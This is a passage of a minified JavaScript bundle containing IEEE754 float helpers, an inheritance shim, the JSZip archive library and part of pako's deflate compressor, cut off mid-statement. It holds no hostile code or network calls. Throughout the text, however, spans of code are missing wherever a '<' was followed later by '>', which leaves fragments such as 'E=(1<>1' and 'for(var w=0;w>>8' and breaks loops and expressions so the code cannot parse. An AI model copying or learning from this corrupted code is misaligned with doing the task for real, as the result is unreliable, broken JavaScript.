I,$,U=8*ae-Q-1,E=(1<>1,b=-7,_=j?ae-1:0,y=j?-1:1,A=de[ie+_];for(_+=y,I=A&(1<<-b)-1,A>>=-b,b+=U;b>0;I=256*I+de[ie+_],_+=y,b-=8);for($=I&(1<<-b)-1,I>>=-b,b+=Q;b>0;$=256*$+de[ie+_],_+=y,b-=8);if(0===I)I=1-C;else{if(I===E)return $?NaN:1/0*(A?-1:1);$+=Math.pow(2,Q),I-=C}return(A?-1:1)*$*Math.pow(2,I-Q)},we.write=function(de,ie,j,Q,ae,I){var $,U,E,C=8*I-ae-1,b=(1<>1,y=23===ae?Math.pow(2,-24)-Math.pow(2,-77):0,A=Q?0:I-1,p=Q?1:-1,D=ie<0||0===ie&&1/ie<0?1:0;for(ie=Math.abs(ie),isNaN(ie)||ie===1/0?(U=isNaN(ie)?1:0,$=b):($=Math.floor(Math.log(ie)/Math.LN2),ie*(E=Math.pow(2,-$))<1&&($--,E*=2),(ie+=$+_>=1?y/E:y*Math.pow(2,1-_))*E>=2&&($++,E/=2),$+_>=b?(U=0,$=b):$+_>=1?(U=(ie*E-1)*Math.pow(2,ae),$+=_):(U=ie*Math.pow(2,_-1)*Math.pow(2,ae),$=0));ae>=8;de[j+A]=255&U,A+=p,U/=256,ae-=8);for($=$<0;de[j+A]=255&$,A+=p,$/=256,C-=8);de[j+A-p]|=128*D}},2270:Pe=>{Pe.exports="function"==typeof Object.create?function(de,ie){ie&&(de.super_=ie,de.prototype=Object.create(ie.prototype,{constructor:{value:de,enumerable:!1,writable:!0,configurable:!0}}))}:function(de,ie){if(ie){de.super_=ie;var j=function(){};j.prototype=ie.prototype,de.prototype=new j,de.prototype.constructor=de}}},7729:Pe=>{"use strict";Pe.exports=function(de){return null!=de&&"object"==typeof de&&!1===Array.isArray(de)}},7040:(Pe,we,de)=>{var ie=de(5449).Buffer,j=de(5486);Pe.exports=function Q(ae,I,$){function U(b,_){if(!I[b]){if(!ae[b]){if(E)return E(b,!0);var A=new Error("Cannot find module '"+b+"'");throw A.code="MODULE_NOT_FOUND",A}var p=I[b]={exports:{}};ae[b][0].call(p.exports,function(D){return U(ae[b][1][D]||D)},p,p.exports,Q,ae,I,$)}return I[b].exports}for(var E=void 0,C=0;C<$.length;C++)U($[C]);return U}({1:[function(Q,ae,I){"use strict";var $=Q("./utils"),U=Q("./support"),E="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=";I.encode=function(C){for(var b,_,y,p,D,w,x=[],S=0,O=C.length,B=O,K="string"!==$.getTypeOf(C);S>4,D=1>6:64,w=2>2)+E.charAt(p)+E.charAt(D)+E.charAt(w));return x.join("")},I.decode=function(C){var b,_,y,A,p,D,w=0,x=0,S="data:";if(C.substr(0,S.length)===S)throw new Error("Invalid base64 input, it looks like a data url.");var O,B=3*(C=C.replace(/[^A-Za-z0-9+/=]/g,"")).length/4;if(C.charAt(C.length-1)===E.charAt(64)&&B--,C.charAt(C.length-2)===E.charAt(64)&&B--,B%1!=0)throw new Error("Invalid base64 input, bad content length.");for(O=U.uint8array?new Uint8Array(0|B):new Array(0|B);w>4,_=(15&A)<<4|(p=E.indexOf(C.charAt(w++)))>>2,y=(3&p)<<6|(D=E.indexOf(C.charAt(w++))),O[x++]=b,64!==p&&(O[x++]=_),64!==D&&(O[x++]=y);return O}},{"./support":30,"./utils":32}],2:[function(Q,ae,I){"use strict";var $=Q("./external"),U=Q("./stream/DataWorker"),E=Q("./stream/Crc32Probe"),C=Q("./stream/DataLengthProbe");function b(_,y,A,p,D){this.compressedSize=_,this.uncompressedSize=y,this.crc32=A,this.compression=p,this.compressedContent=D}b.prototype={getContentWorker:function(){var _=new U($.Promise.resolve(this.compressedContent)).pipe(this.compression.uncompressWorker()).pipe(new C("data_length")),y=this;return _.on("end",function(){if(this.streamInfo.data_length!==y.uncompressedSize)throw new Error("Bug : uncompressed data size mismatch")}),_},getCompressedWorker:function(){return new U($.Promise.resolve(this.compressedContent)).withStreamInfo("compressedSize",this.compressedSize).withStreamInfo("uncompressedSize",this.uncompressedSize).withStreamInfo("crc32",this.crc32).withStreamInfo("compression",this.compression)}},b.createWorkerFrom=function(_,y,A){return _.pipe(new E).pipe(new C("uncompressedSize")).pipe(y.compressWorker(A)).pipe(new C("compressedSize")).withStreamInfo("compression",y)},ae.exports=b},{"./external":6,"./stream/Crc32Probe":25,"./stream/DataLengthProbe":26,"./stream/DataWorker":27}],3:[function(Q,ae,I){"use strict";var $=Q("./stream/GenericWorker");I.STORE={magic:"\0\0",compressWorker:function(){return new $("STORE compression")},uncompressWorker:function(){return new $("STORE decompression")}},I.DEFLATE=Q("./flate")},{"./flate":7,"./stream/GenericWorker":28}],4:[function(Q,ae,I){"use strict";var $=Q("./utils"),U=function(){for(var E,C=[],b=0;b<256;b++){E=b;for(var _=0;_<8;_++)E=1&E?3988292384^E>>>1:E>>>1;C[b]=E}return C}();ae.exports=function(E,C){return void 0!==E&&E.length?"string"!==$.getTypeOf(E)?function(b,_,y,A){var p=U,D=0+y;b^=-1;for(var w=0;w>>8^p[255&(b^_[w])];return-1^b}(0|C,E,E.length):function(b,_,y,A){var p=U,D=0+y;b^=-1;for(var w=0;w>>8^p[255&(b^_.charCodeAt(w))];return-1^b}(0|C,E,E.length):0}},{"./utils":32}],5:[function(Q,ae,I){"use strict";I.base64=!1,I.binary=!1,I.dir=!1,I.createFolders=!0,I.date=null,I.compression=null,I.compressionOptions=null,I.comment=null,I.unixPermissions=null,I.dosPermissions=null},{}],6:[function(Q,ae,I){"use strict";var $;$="undefined"!=typeof Promise?Promise:Q("lie"),ae.exports={Promise:$}},{lie:37}],7:[function(Q,ae,I){"use strict";var $="undefined"!=typeof Uint8Array&&"undefined"!=typeof Uint16Array&&"undefined"!=typeof Uint32Array,U=Q("pako"),E=Q("./utils"),C=Q("./stream/GenericWorker"),b=$?"uint8array":"array";function _(y,A){C.call(this,"FlateWorker/"+y),this._pako=null,this._pakoAction=y,this._pakoOptions=A,this.meta={}}I.magic="\b\0",E.inherits(_,C),_.prototype.processChunk=function(y){this.meta=y.meta,null===this._pako&&this._createPako(),this._pako.push(E.transformTo(b,y.data),!1)},_.prototype.flush=function(){C.prototype.flush.call(this),null===this._pako&&this._createPako(),this._pako.push([],!0)},_.prototype.cleanUp=function(){C.prototype.cleanUp.call(this),this._pako=null},_.prototype._createPako=function(){this._pako=new U[this._pakoAction]({raw:!0,level:this._pakoOptions.level||-1});var y=this;this._pako.onData=function(A){y.push({data:A,meta:y.meta})}},I.compressWorker=function(y){return new _("Deflate",y)},I.uncompressWorker=function(){return new _("Inflate",{})}},{"./stream/GenericWorker":28,"./utils":32,pako:38}],8:[function(Q,ae,I){"use strict";function $(p,D){var w,x="";for(w=0;w>>=8;return x}function U(p,D,w,x,S,O){var B,K,ee=p.file,se=p.compression,ve=O!==b.utf8encode,le=E.transformTo("string",O(ee.name)),ye=E.transformTo("string",b.utf8encode(ee.name)),z=ee.comment,l=E.transformTo("string",O(z)),f=E.transformTo("string",b.utf8encode(z)),v=ye.length!==ee.name.length,M=f.length!==z.length,P="",G="",X="",L=ee.dir,h=ee.date,R={crc32:0,compressedSize:0,uncompressedSize:0};D&&!w||(R.crc32=p.crc32,R.compressedSize=p.compressedSize,R.uncompressedSize=p.uncompressedSize);var J=0;D&&(J|=8),ve||!v&&!M||(J|=2048);var Ae,Xe,Z=0,ue=0;L&&(Z|=16),"UNIX"===S?(ue=798,Z|=(Xe=Ae=ee.unixPermissions,Ae||(Xe=L?16893:33204),(65535&Xe)<<16)):(ue=20,Z|=function(Ae){return 63&(Ae||0)}(ee.dosPermissions)),B=h.getUTCHours(),B<<=6,B|=h.getUTCMinutes(),B<<=5,B|=h.getUTCSeconds()/2,K=h.getUTCFullYear()-1980,K<<=4,K|=h.getUTCMonth()+1,K<<=5,K|=h.getUTCDate(),v&&(G=$(1,1)+$(_(le),4)+ye,P+="up"+$(G.length,2)+G),M&&(X=$(1,1)+$(_(l),4)+f,P+="uc"+$(X.length,2)+X);var Ie="";return Ie+="\n\0",Ie+=$(J,2),Ie+=se.magic,Ie+=$(B,2),Ie+=$(K,2),Ie+=$(R.crc32,4),Ie+=$(R.compressedSize,4),Ie+=$(R.uncompressedSize,4),Ie+=$(le.length,2),Ie+=$(P.length,2),{fileRecord:y.LOCAL_FILE_HEADER+Ie+le+P,dirRecord:y.CENTRAL_FILE_HEADER+$(ue,2)+Ie+$(l.length,2)+"\0\0\0\0"+$(Z,4)+$(x,4)+le+P+l}}var E=Q("../utils"),C=Q("../stream/GenericWorker"),b=Q("../utf8"),_=Q("../crc32"),y=Q("../signature");function A(p,D,w,x){C.call(this,"ZipFileWorker"),this.bytesWritten=0,this.zipComment=D,this.zipPlatform=w,this.encodeFileName=x,this.streamFiles=p,this.accumulate=!1,this.contentBuffer=[],this.dirRecords=[],this.currentSourceOffset=0,this.entriesCount=0,this.currentFile=null,this._sources=[]}E.inherits(A,C),A.prototype.push=function(p){var D=p.meta.percent||0,w=this.entriesCount,x=this._sources.length;this.accumulate?this.contentBuffer.push(p):(this.bytesWritten+=p.data.length,C.prototype.push.call(this,{data:p.data,meta:{currentFile:this.currentFile,percent:w?(D+100*(w-x-1))/w:100}}))},A.prototype.openedSource=function(p){this.currentSourceOffset=this.bytesWritten,this.currentFile=p.file.name;var D=this.streamFiles&&!p.file.dir;if(D){var w=U(p,D,!1,this.currentSourceOffset,this.zipPlatform,this.encodeFileName);this.push({data:w.fileRecord,meta:{percent:0}})}else this.accumulate=!0},A.prototype.closedSource=function(p){this.accumulate=!1;var x,D=this.streamFiles&&!p.file.dir,w=U(p,D,!0,this.currentSourceOffset,this.zipPlatform,this.encodeFileName);if(this.dirRecords.push(w.dirRecord),D)this.push({data:(x=p,y.DATA_DESCRIPTOR+$(x.crc32,4)+$(x.compressedSize,4)+$(x.uncompressedSize,4)),meta:{percent:100}});else for(this.push({data:w.fileRecord,meta:{percent:0}});this.contentBuffer.length;)this.push(this.contentBuffer.shift());this.currentFile=null},A.prototype.flush=function(){for(var p=this.bytesWritten,D=0;D=this.index;C--)b=(b<<8)+this.byteAt(C);return this.index+=E,b},readString:function(E){return $.transformTo("string",this.readData(E))},readData:function(){},lastIndexOfSignature:function(){},readAndCheckSignature:function(){},readDate:function(){var E=this.readInt(4);return new Date(Date.UTC(1980+(E>>25&127),(E>>21&15)-1,E>>16&31,E>>11&31,E>>5&63,(31&E)<<1))}},ae.exports=U},{"../utils":32}],19:[function(Q,ae,I){"use strict";var $=Q("./Uint8ArrayReader");function U(E){$.call(this,E)}Q("../utils").inherits(U,$),U.prototype.readData=function(E){this.checkOffset(E);var C=this.data.slice(this.zero+this.index,this.zero+this.index+E);return this.index+=E,C},ae.exports=U},{"../utils":32,"./Uint8ArrayReader":21}],20:[function(Q,ae,I){"use strict";var $=Q("./DataReader");function U(E){$.call(this,E)}Q("../utils").inherits(U,$),U.prototype.byteAt=function(E){return this.data.charCodeAt(this.zero+E)},U.prototype.lastIndexOfSignature=function(E){return this.data.lastIndexOf(E)-this.zero},U.prototype.readAndCheckSignature=function(E){return E===this.readData(4)},U.prototype.readData=function(E){this.checkOffset(E);var C=this.data.slice(this.zero+this.index,this.zero+this.index+E);return this.index+=E,C},ae.exports=U},{"../utils":32,"./DataReader":18}],21:[function(Q,ae,I){"use strict";var $=Q("./ArrayReader");function U(E){$.call(this,E)}Q("../utils").inherits(U,$),U.prototype.readData=function(E){if(this.checkOffset(E),0===E)return new Uint8Array(0);var C=this.data.subarray(this.zero+this.index,this.zero+this.index+E);return this.index+=E,C},ae.exports=U},{"../utils":32,"./ArrayReader":17}],22:[function(Q,ae,I){"use strict";var $=Q("../utils"),U=Q("../support"),E=Q("./ArrayReader"),C=Q("./StringReader"),b=Q("./NodeBufferReader"),_=Q("./Uint8ArrayReader");ae.exports=function(y){var A=$.getTypeOf(y);return $.checkSupport(A),"string"!==A||U.uint8array?"nodebuffer"===A?new b(y):U.uint8array?new _($.transformTo("uint8array",y)):new E($.transformTo("array",y)):new C(y)}},{"../support":30,"../utils":32,"./ArrayReader":17,"./NodeBufferReader":19,"./StringReader":20,"./Uint8ArrayReader":21}],23:[function(Q,ae,I){"use strict";I.LOCAL_FILE_HEADER="PK\x03\x04",I.CENTRAL_FILE_HEADER="PK\x01\x02",I.CENTRAL_DIRECTORY_END="PK\x05\x06",I.ZIP64_CENTRAL_DIRECTORY_LOCATOR="PK\x06\x07",I.ZIP64_CENTRAL_DIRECTORY_END="PK\x06\x06",I.DATA_DESCRIPTOR="PK\x07\b"},{}],24:[function(Q,ae,I){"use strict";var $=Q("./GenericWorker"),U=Q("../utils");function E(C){$.call(this,"ConvertWorker to "+C),this.destType=C}U.inherits(E,$),E.prototype.processChunk=function(C){this.push({data:U.transformTo(this.destType,C.data),meta:C.meta})},ae.exports=E},{"../utils":32,"./GenericWorker":28}],25:[function(Q,ae,I){"use strict";var $=Q("./GenericWorker"),U=Q("../crc32");function E(){$.call(this,"Crc32Probe"),this.withStreamInfo("crc32",0)}Q("../utils").inherits(E,$),E.prototype.processChunk=function(C){this.streamInfo.crc32=U(C.data,this.streamInfo.crc32||0),this.push(C)},ae.exports=E},{"../crc32":4,"../utils":32,"./GenericWorker":28}],26:[function(Q,ae,I){"use strict";var $=Q("../utils"),U=Q("./GenericWorker");function E(C){U.call(this,"DataLengthProbe for "+C),this.propName=C,this.withStreamInfo(C,0)}$.inherits(E,U),E.prototype.processChunk=function(C){C&&(this.streamInfo[this.propName]=(this.streamInfo[this.propName]||0)+C.data.length),U.prototype.processChunk.call(this,C)},ae.exports=E},{"../utils":32,"./GenericWorker":28}],27:[function(Q,ae,I){"use strict";var $=Q("../utils"),U=Q("./GenericWorker");function E(C){U.call(this,"DataWorker");var b=this;this.dataIsReady=!1,this.index=0,this.max=0,this.data=null,this.type="",this._tickScheduled=!1,C.then(function(_){b.dataIsReady=!0,b.data=_,b.max=_&&_.length||0,b.type=$.getTypeOf(_),b.isPaused||b._tickAndRepeat()},function(_){b.error(_)})}$.inherits(E,U),E.prototype.cleanUp=function(){U.prototype.cleanUp.call(this),this.data=null},E.prototype.resume=function(){return!!U.prototype.resume.call(this)&&(!this._tickScheduled&&this.dataIsReady&&(this._tickScheduled=!0,$.delay(this._tickAndRepeat,[],this)),!0)},E.prototype._tickAndRepeat=function(){this._tickScheduled=!1,this.isPaused||this.isFinished||(this._tick(),this.isFinished||($.delay(this._tickAndRepeat,[],this),this._tickScheduled=!0))},E.prototype._tick=function(){if(this.isPaused||this.isFinished)return!1;var C=null,b=Math.min(this.max,this.index+16384);if(this.index>=this.max)return this.end();switch(this.type){case"string":C=this.data.substring(this.index,b);break;case"uint8array":C=this.data.subarray(this.index,b);break;case"array":case"nodebuffer":C=this.data.slice(this.index,b)}return this.index=b,this.push({data:C,meta:{percent:this.max?this.index/this.max*100:0}})},ae.exports=E},{"../utils":32,"./GenericWorker":28}],28:[function(Q,ae,I){"use strict";function $(U){this.name=U||"default",this.streamInfo={},this.generatedError=null,this.extraStreamInfo={},this.isPaused=!0,this.isFinished=!1,this.isLocked=!1,this._listeners={data:[],end:[],error:[]},this.previous=null}$.prototype={push:function(U){this.emit("data",U)},end:function(){if(this.isFinished)return!1;this.flush();try{this.emit("end"),this.cleanUp(),this.isFinished=!0}catch(U){this.emit("error",U)}return!0},error:function(U){return!this.isFinished&&(this.isPaused?this.generatedError=U:(this.isFinished=!0,this.emit("error",U),this.previous&&this.previous.error(U),this.cleanUp()),!0)},on:function(U,E){return this._listeners[U].push(E),this},cleanUp:function(){this.streamInfo=this.generatedError=this.extraStreamInfo=null,this._listeners=[]},emit:function(U,E){if(this._listeners[U])for(var C=0;C "+U:U}},ae.exports=$},{}],29:[function(Q,ae,I){"use strict";var $=Q("../utils"),U=Q("./ConvertWorker"),E=Q("./GenericWorker"),C=Q("../base64"),b=Q("../support"),_=Q("../external"),y=null;if(b.nodestream)try{y=Q("../nodejs/NodejsStreamOutputAdapter")}catch(D){}function p(D,w,x){var S=w;switch(w){case"blob":case"arraybuffer":S="uint8array";break;case"base64":S="string"}try{this._internalType=S,this._outputType=w,this._mimeType=x,$.checkSupport(S),this._worker=D.pipe(new U(S)),D.lock()}catch(O){this._worker=new E("error"),this._worker.error(O)}}p.prototype={accumulate:function(D){return function A(D,w){return new _.Promise(function(x,S){var O=[],B=D._internalType,K=D._outputType,ee=D._mimeType;D.on("data",function(se,ve){O.push(se),w&&w(ve)}).on("error",function(se){O=[],S(se)}).on("end",function(){try{var se=function(ve,le,ye){switch(ve){case"blob":return $.newBlob($.transformTo("arraybuffer",le),ye);case"base64":return C.encode(le);default:return $.transformTo(ve,le)}}(K,function(ve,le){var ye,z=0,l=null,f=0;for(ye=0;ye>>6:(x<65536?w[B++]=224|x>>>12:(w[B++]=240|x>>>18,w[B++]=128|x>>>12&63),w[B++]=128|x>>>6&63),w[B++]=128|63&x);return w}(p)},I.utf8decode=function(p){return U.nodebuffer?$.transformTo("nodebuffer",p).toString("utf-8"):function(D){var w,x,S,O,B=D.length,K=new Array(2*B);for(w=x=0;w>10&1023,K[x++]=56320|1023&S)}return K.length!==x&&(K.subarray?K=K.subarray(0,x):K.length=x),$.applyFromCharCode(K)}(p=$.transformTo(U.uint8array?"uint8array":"array",p))},$.inherits(y,C),y.prototype.processChunk=function(p){var D=$.transformTo(U.uint8array?"uint8array":"array",p.data);if(this.leftOver&&this.leftOver.length){if(U.uint8array){var w=D;(D=new Uint8Array(w.length+this.leftOver.length)).set(this.leftOver,0),D.set(w,this.leftOver.length)}else D=this.leftOver.concat(D);this.leftOver=null}var x=function(O,B){var K;for((B=B||O.length)>O.length&&(B=O.length),K=B-1;0<=K&&128==(192&O[K]);)K--;return K<0||0===K?B:K+b[O[K]]>B?K:B}(D),S=D;x!==D.length&&(U.uint8array?(S=D.subarray(0,x),this.leftOver=D.subarray(x,D.length)):(S=D.slice(0,x),this.leftOver=D.slice(x,D.length))),this.push({data:I.utf8decode(S),meta:p.meta})},y.prototype.flush=function(){this.leftOver&&this.leftOver.length&&(this.push({data:I.utf8decode(this.leftOver),meta:{}}),this.leftOver=null)},I.Utf8DecodeWorker=y,$.inherits(A,C),A.prototype.processChunk=function(p){this.push({data:I.utf8encode(p.data),meta:p.meta})},I.Utf8EncodeWorker=A},{"./nodejsUtils":14,"./stream/GenericWorker":28,"./support":30,"./utils":32}],32:[function(Q,ae,I){"use strict";var $=Q("./support"),U=Q("./base64"),E=Q("./nodejsUtils"),C=Q("./external");function b(w){return w}function _(w,x){for(var S=0;S>8;this.dir=!!(16&this.externalFileAttributes),0==p&&(this.dosPermissions=63&this.externalFileAttributes),3==p&&(this.unixPermissions=this.externalFileAttributes>>16&65535),this.dir||"/"!==this.fileNameStr.slice(-1)||(this.dir=!0)},parseZIP64ExtraField:function(){if(this.extraFields[1]){var p=$(this.extraFields[1].value);this.uncompressedSize===U.MAX_VALUE_32BITS&&(this.uncompressedSize=p.readInt(8)),this.compressedSize===U.MAX_VALUE_32BITS&&(this.compressedSize=p.readInt(8)),this.localHeaderOffset===U.MAX_VALUE_32BITS&&(this.localHeaderOffset=p.readInt(8)),this.diskNumberStart===U.MAX_VALUE_32BITS&&(this.diskNumberStart=p.readInt(4))}},readExtraFields:function(p){var D,w,x,S=p.index+this.extraFieldsLength;for(this.extraFields||(this.extraFields={});p.index+4>>6:(p<65536?A[x++]=224|p>>>12:(A[x++]=240|p>>>18,A[x++]=128|p>>>12&63),A[x++]=128|p>>>6&63),A[x++]=128|63&p);return A},I.buf2binstring=function(y){return _(y,y.length)},I.binstring2buf=function(y){for(var A=new $.Buf8(y.length),p=0,D=A.length;p>10&1023,O[D++]=56320|1023&w)}return _(O,D)},I.utf8border=function(y,A){var p;for((A=A||y.length)>y.length&&(A=y.length),p=A-1;0<=p&&128==(192&y[p]);)p--;return p<0||0===p?A:p+C[y[p]]>A?p:A}},{"./common":41}],43:[function(Q,ae,I){"use strict";ae.exports=function($,U,E,C){for(var b=65535&$|0,_=$>>>16&65535|0,y=0;0!==E;){for(E-=y=2e3>>1:U>>>1;E[C]=U}return E}();ae.exports=function(U,E,C,b){var _=$,y=b+C;U^=-1;for(var A=b;A>>8^_[255&(U^E[A])];return-1^U}},{}],46:[function(Q,ae,I){"use strict";var $,U=Q("../utils/common"),E=Q("./trees"),C=Q("./adler32"),b=Q("./crc32"),_=Q("./messages"),D=-2,z=258,l=262,v=113;function L(me,Ke){return me.msg=_[Ke],Ke}function h(me){return(me<<1)-(4me.avail_out&&(rt=me.avail_out),0!==rt&&(U.arraySet(me.output,Ke.pending_buf,Ke.pending_out,rt,me.next_out),me.next_out+=rt,Ke.pending_out+=rt,me.total_out+=rt,me.avail_out-=rt,Ke.pending-=rt,0===Ke.pending&&(Ke.pending_out=0))}function Z(me,Ke){E._tr_flush_block(me,0<=me.block_start?me.block_start:-1,me.strstart-me.block_start,Ke),me.block_start=me.strstart,J(me.strm)}function ue(me,Ke){me.pending_buf[me.pending++]=Ke}function Ie(me,Ke){me.pending_buf[me.pending++]=Ke>>>8&255,me.pending_buf[me.pending++]=255&Ke}function Ae(me,Ke){var rt,Ge,Qe=me.max_chain_length,ht=me.strstart,mt=me.prev_length,lt=me.nice_match,ft=me.strstart>me.w_size-l?me.strstart-(me.w_size-l):0,xe=me.window,We=me.w_mask,Je=me.prev,Oe=me.strstart+z,Te=xe[ht+mt-1],Le=xe[ht+mt];me.prev_length>=me.good_match&&(Qe>>=2),lt>me.lookahead&&(lt=me.lookahead);do{if(xe[(rt=Ke)+mt]===Le&&xe[rt+mt-1]===Te&&xe[rt]===xe[ht]&&xe[++rt]===xe[ht+1]){ht+=2,rt++;do{}while(xe[++ht]===xe[++rt]&&xe[++ht]===xe[++rt]&&xe[++ht]===xe[++rt]&&xe[++ht]===xe[++rt]&&xe[++ht]===xe[++rt]&&xe[++ht]===xe[++rt]&&xe[++ht]===xe[++rt]&&xe[++ht]===xe[++rt]&&htft&&0!=--Qe);return mt<=me.lookahead?mt:me.lookahead}function Ue(me){var Ke,rt,Ge,Qe,ht,mt,lt,ft,xe,We,Je=me.w_size;do{if(Qe=me.window_size-me.lookahead-me.strstart,me.strstart>=Je+(Je-l)){for(U.arraySet(me.window,me.window,Je,Je,0),me.match_start-=Je,me.strstart-=Je,me.block_start-=Je,Ke=rt=me.hash_size;Ge=me.head[--Ke],me.head[Ke]=Je<=Ge?Ge-Je:0,--rt;);for(Ke=rt=Je;Ge=me.prev[--Ke],me.prev[Ke]=Je<=Ge?Ge-Je:0,--rt;);Qe+=Je}if(0===me.strm.avail_in)break;if(lt=me.window,ft=me.strstart+me.lookahead,We=void 0,(xe=Qe)<(We=(mt=me.strm).avail_in)&&(We=xe),rt=0===We?0:(mt.avail_in-=We,U.arraySet(lt,mt.input,mt.next_in,We,ft),1===mt.state.wrap?mt.adler=C(mt.adler,lt,We,ft):2===mt.state.wrap&&(mt.adler=b(mt.adler,lt,We,ft)),mt.next_in+=We,mt.total_in+=We,We),me.lookahead+=rt,me.lookahead+me.insert>=3)for(me.ins_h=me.window[ht=me.strstart-me.insert],me.ins_h=(me.ins_h<=3&&(me.ins_h=(me.ins_h<=3)if(Ge=E._tr_tally(me,me.strstart-me.match_start,me.match_length-3),me.lookahead-=me.match_length,me.match_length<=me.max_lazy_match&&me.lookahead>=3){for(me.match_length--;me.strstart++,me.ins_h=(me.ins_h<=3&&(me.ins_h=(me.ins_h<=3&&me.match_length<=me.prev_length){for(Qe=me.strstart+me.lookahead-3,Ge=E._tr_tally(me,me.strstart-1-me.prev_match,me.prev_length-3),me.lookahead-=me.prev_length-1,me.prev_length-=2;++me.strstart<=Qe&&(me.ins_h=(me.ins_h<me.pending_buf_size-5&&(rt=me.pending_buf_size-5);;){if(me.lookahead<=1){if(Ue(me),0===me.lookahead&&0===Ke)return 1;if(0===me.lookahead)break}me.strstart+=me.lookahead,me.lookahead=0;var Ge=me.block_start+rt;if((0===me.strstart||me.strstart>=Ge)&&(me.lookahead=me.strstart-Ge,me.strstart=Ge,Z(me,!1),0===me.strm.avail_out)||me.strstart-me.block_start>=me.w_size-l&&(Z(me,!1),0===me.strm.avail_out))return 1}return me.insert=0,4===Ke?(Z(me,!0),0===me.strm.avail_out?3:4):(me.strstart>me.block_start&&Z(me,!1),1)}),new Be(4,4,8,4,Xe),new Be(4,5,16,8,Xe),new Be(4,6,32,32,Xe),new Be(4,4,16,16,He),new Be(8,16,32,32,He),new Be(8,16,128,128,He),new Be(8,32,128,256,He),new Be(32,128,258,1024,He),new Be(32,258,258,4096,He)],I.deflateInit=function(me,Ke){return ze(me,Ke,8,15,8,0)},I.deflateInit2=ze,I.deflateReset=Ve,I.deflateResetKeep=De,I.deflateSetHeader=function(me,Ke){return me&&me.state?2!==me.state.wrap?D:(me.state.gzhead=Ke,0):D},I.deflate=function(me,Ke){var rt,Ge,Qe,ht;if(!me||!me.state||5>8&255),ue(Ge,Ge.gzhead.time>>16&255),ue(Ge,Ge.gzhead.time>>24&255),ue(Ge,9===Ge.level?2:2<=Ge.strategy||Ge.level<2?4:0),ue(Ge,255&Ge.gzhead.os),Ge.gzhead.extra&&Ge.gzhead.extra.length&&(ue(Ge,255&Ge.gzhead.extra.length),ue(Ge,Ge.gzhead.extra.length>>8&255)),Ge.gzhead.hcrc&&(me.adler=b(me.adler,Ge.pending_buf,Ge.pending,0)),Ge.gzindex=0,Ge.status=69):(ue(Ge,0),ue(Ge,0),ue(Ge,0),ue(Ge,0),ue(Ge,0),ue(Ge,9===Ge.level?2:2<=Ge.strategy||Ge.level<2?4:0),ue(Ge,3),Ge.status=v);else{var mt=8+(Ge.w_bits-8<<4)<<8;mt|=(2<=Ge.strategy||Ge.level<2?0:Ge.level<6?1:6===Ge.level?2:3)<<6,0!==Ge.strstart&&(mt|=32),mt+=31-mt%31,Ge.status=v,Ie(Ge,mt),0!==Ge.strstart&&(Ie(Ge,me.adler>>>16),Ie(Ge,65535&me.adler)),me.adler=1}if(69===Ge.status)if(Ge.gzhead.extra){for(Qe=Ge.pending;Ge.gzindex<(65535&Ge.gzhead.extra.length)&&(Ge.pending!==Ge.pending_buf_size||(Ge.gzhead.hcrc&&Ge.pending>Qe&&(me.adler=b(me.adler,Ge.pending_buf,Ge.pending-Qe,Qe)),J(me),Qe=Ge.pending,Ge.pending!==Ge.pending_buf_size));)ue(Ge,255&Ge.gzhead.extra[Ge.gzindex]),Ge.gzindex++;Ge.gzhead.hcrc&&Ge.pending>Qe&&(me.adler=b(me.adler,Ge.pending_buf,Ge.pending-Qe,Qe)),Ge.gzindex===Ge.gzhead.extra.length&&(Ge.gzindex=0,Ge.status=73)}else Ge.status=73;if(73===Ge.status)if(Ge.gzhead.name){Qe=Ge.pending;do{if(Ge.pending===Ge.pending_buf_size&&(Ge.gzhead.hcrc&&Ge.pending>Qe&&(me.adler=b(me.adler,Ge.pending_buf,Ge.pending-Qe,Qe)),J(me),Qe=Ge.pending,Ge.pending===Ge.pending_buf_size)){ht=1;break}ht=Ge.gzindexQe&&(me.adler=b(me.adler,Ge.pending_buf,Ge.pending-Qe,Qe)),0===ht&&(Ge.gzindex=0,Ge.status=91)}else Ge.status=91;if(91===Ge.status)if(Ge.gzhead.comment){Qe=Ge.pending;do{if(Ge.pending===Ge.pending_buf_size&&(Ge.gzhead.hcrc&&Ge.pending>Qe&&(me.adler=b(me.adler,Ge.pending_buf,Ge.pending-Qe,Qe)),J(me),Qe=Ge.pending,Ge.pending===Ge.pending_buf_size)){ht=1;break}ht=Ge.gzindexQe&&(me.adler=b(me.adler,Ge.pending_buf,Ge.pending-Qe,Qe)),0===ht&&(Ge.status=103)}else Ge.status=103;if(103===Ge.status&&(Ge.gzhead.hcrc?(Ge.pending+2>Ge.pending_buf_size&&J(me),Ge.pending+2<=Ge.pending_buf_size&&(ue(Ge,255&me.adler),ue(Ge,me.adler>>8&255),me.adler=0,Ge.status=v)):Ge.status=v),0!==Ge.pending){if(J(me),0===me.avail_out)return Ge.last_flush=-1,0}else if(0===me.avail_in&&h(Ke)<=h(rt)&&4!==Ke)return L(me,-5);if(666===Ge.status&&0!==me.avail_in)return L(me,-5);if(0!==me.avail_in||0!==Ge.lookahead||0!==Ke&&666!==Ge.status){var lt=2===Ge.strategy?function(ft,xe){for(var We;;){if(0===ft.lookahead&&(Ue(ft),0===ft.lookahead)){if(0===xe)return 1;break}if(ft.match_length=0,We=E._tr_tally(ft,0,ft.window[ft.strstart]),ft.lookahead--,ft.strstart++,We&&(Z(ft,!1),0===ft.strm.avail_out))return 1}return ft.insert=0,4===xe?(Z(ft,!0),0===ft.strm.avail_out?3:4):ft.last_lit&&(Z(ft,!1),0===ft.strm.avail_out)?1:2}(Ge,Ke):3===Ge.strategy?function(ft,xe){for(var We,Je,Oe,Te,Le=ft.window;;){if(ft.lookahead<=z){if(Ue(ft),ft.lookahead<=z&&0===xe)return 1;if(0===ft.lookahead)break}if(ft.match_length=0,ft.lookahead>=3&&0ft.lookahead&&(ft.match_length=ft.lookahead)}if(ft.match_length>=3?(We=E._tr_tally(ft,1,ft.match_length-3),ft.lookahead-=ft.match_length,ft.strstart+=ft.match_length,ft.match_length=0):(We=E._tr_tally(ft,0,ft.window[ft.strstart]),ft.lookahead--,ft.strstart++),We&&(Z(ft,!1),0===ft.strm.avail_out))return 1}return ft.insert=0,4===xe?(Z(ft,!0),0===ft.strm.avail_out?3:4):ft.last_lit&&(Z(ft,!1),0===ft.strm.avail_out)?1:2}(Ge,Ke):$[Ge.level].func(Ge,Ke);if(3!==lt&&4!==lt||(Ge.status=666),1===lt||3===lt)return 